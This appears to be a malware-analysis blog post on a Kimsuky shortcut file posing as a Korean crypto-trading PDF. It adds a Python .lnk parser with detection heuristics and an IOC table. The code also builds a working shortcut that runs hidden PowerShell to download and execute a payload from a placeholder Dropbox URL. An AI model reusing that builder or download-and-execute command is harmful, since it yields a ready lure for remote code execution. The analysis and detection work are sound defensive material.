2024-10-14 Kimsuky malware disguised as coin futures trading: 코인 선물 트레이딩 비법서, 수익률 증폭의 핵심 원리.pdf.lnk ("Coin Futures Trading Guide, Core Principles for Amplifying Returns") (2024.10.14)

http://wezard4u.tistory.com/429301


A Kimsuky-linked Windows shortcut (.lnk) sample is disguised as a PDF guide to coin futures trading and is described as targeting people interested in cryptocurrency or futures trading. When opened, the LNK launches PowerShell hidden and non-interactively, builds a Dropbox user-content (dropboxusercontent) URL, downloads an encrypted payload named ad_ps.bin, decrypts it with a hardcoded password, and executes the resulting script. The follow-on PowerShell collects host details: IP address, boot time, OS information, computer type, installed antivirus products, install date, and running processes. It writes the collected data to a timestamped text file, uploads that file through the Dropbox API, and then deletes it locally. The sample is therefore useful for tracking Kimsuky-style abuse of a legitimate cloud service for both payload staging and exfiltration.
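The triage step a responder would want for this kind of sample is to pull the hidden PowerShell command line out of the .lnk itself and score it against the behaviours described above (hidden, non-interactive PowerShell; a download from a dropboxusercontent host; in-memory execution). The following is an added example, not code from the original post or from the sample: a minimal MS-SHLLINK parser that reads the header, skips the ID list and LinkInfo, and decodes the StringData fields, plus a heuristic scorer. The embedded .lnk is constructed inline; its dl.dropboxusercontent.com path, icon path and exact switches are placeholders and not the real indicators, and the real sample's password-based decryption of ad_ps.bin is not reproduced.

```python
"""Minimal Shell Link (.lnk) parser plus triage heuristics for a
Kimsuky-style PowerShell dropper. Added example; the sample .lnk below is
constructed here and its URL/icon/switches are placeholders."""
import re
import struct

# ShellLinkHeader (MS-SHLLINK): 0x4C bytes, LinkFlags at 0x14, ShowCommand at 0x3C.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 1, 2, 4, 8
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 16, 32, 64, 128
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location")]
SW_SHOWMINNOACTIVE = 7  # common in malicious LNKs: start minimised, no focus


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a .lnk."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    off = 0x4C
    if flags & HAS_IDLIST:                    # skip LinkTargetIDList (2-byte size + items)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:                  # skip LinkInfo (size field includes itself)
        off += struct.unpack_from("<I", data, off)[0]
    for flag, name in STRING_FIELDS:          # StringData blocks appear in this fixed order
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters
        off += 2
        if flags & IS_UNICODE:
            info[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            info[name] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return info


# Regexes over the COMMAND_LINE_ARGUMENTS field; each hit names the behaviour.
ARG_INDICATORS = [
    ("hidden window (-WindowStyle Hidden)", r"-w(?:indowstyle)?\s+hidden"),
    ("non-interactive (-NonInteractive)", r"-noni(?:nteractive)?\b"),
    ("execution policy bypass", r"-e(?:xecutionpolicy|p)\s+bypass"),
    ("download cradle", r"Download(?:Data|String|File)|Invoke-WebRequest|\biwr\b|Net\.WebClient"),
    ("Dropbox user-content / API host", r"dropboxusercontent\.com|dropboxapi\.com"),
    ("in-memory execution (IEX)", r"\biex\b|Invoke-Expression"),
]


def triage(lnk: dict, filename: str) -> dict:
    """Score a parsed .lnk; returns the hits, extracted URLs and reconstructed command line."""
    hits = []
    args = lnk.get("arguments", "")
    target = lnk.get("relative_path", "").lower()
    if re.search(r"\.(?:pdf|docx?|xlsx?|hwp)\.lnk$", filename, re.I):
        hits.append("document double extension")
    if "powershell" in target or "powershell" in args.lower():
        hits.append("PowerShell launched from shortcut")
    if lnk["show_command"] == SW_SHOWMINNOACTIVE:
        hits.append("ShowCommand SW_SHOWMINNOACTIVE (window minimised)")
    if re.search(r"acro|pdf", lnk.get("icon_location", ""), re.I):
        hits.append("icon borrowed from a PDF viewer")
    for label, pattern in ARG_INDICATORS:
        if re.search(pattern, args, re.I):
            hits.append(label)
    urls = re.findall(r"https?://[^\s'\";]+", args)  # C2/staging URLs to pivot on
    return {"score": len(hits), "hits": hits, "urls": urls,
            "command_line": (target + " " + args).strip()}


def build_lnk(relative_path: str, arguments: str, icon: str, show_command: int = 1) -> bytes:
    """Assemble a minimal .lnk: header, one-item IDList, UTF-16 StringData (constructed)."""
    flags = HAS_IDLIST | HAS_RELPATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    items = b"\x05\x00abc" + b"\x00\x00"           # one dummy ItemID + TerminalID
    idlist = struct.pack("<H", len(items)) + items

    def sd(s: str) -> bytes:                      # CountCharacters + UTF-16LE chars
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + idlist + sd(relative_path) + sd(arguments) + sd(icon)


# Constructed sample mirroring the described behaviour (hidden, non-interactive
# PowerShell fetching ad_ps.bin from a Dropbox user-content URL and running it).
# Placeholder URL path/icon path; the real decryption step is deliberately omitted.
SAMPLE_NAME = "코인 선물 트레이딩 비법서, 수익률 증폭의 핵심 원리.pdf.lnk"
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -noni -ep bypass -c \"$u='https://dl.dropboxusercontent.com/s/EXAMPLE/ad_ps.bin';"
    "$b=(New-Object Net.WebClient).DownloadData($u);IEX([Text.Encoding]::UTF8.GetString($b))\"",
    r"%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe", show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    print(triage(parse_lnk(SAMPLE_LNK), SAMPLE_NAME))
```

Run `parse_lnk` on the real file's bytes and feed the result to `triage`; the `urls` list gives the staging URL to block or hunt on, and the `command_line` field is what to compare against process-creation telemetry (parent explorer.exe, image powershell.exe). The parser deliberately ignores ExtraData blocks after StringData, so it tolerates trailing junk that some droppers append.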

Indicators of Compromise

Type    Value                              First Seen  Last Seen
HASH    4e317495e0c2ae3e46a9f7a810184b30   2024-10-14  2024-10-14
HASH    af0b9aea91b2ea6567fbd4ba19839b4…   2024-10-14  2024-10-14
HASH    d47fe15d4f1176e1952d11b2cfeaebb…   2024-10-14  2024-10-14
DOMAIN  ontent.com                         2024-10-14  2024-10-14
IPv4    6.6.4.1                            2024-10-08  2024-10-14

The two hashes ending in … and the DOMAIN value are truncated as shown in the source; the first hash is 32 hex characters (MD5 length). Do not pivot on the partial domain string as a standalone indicator.
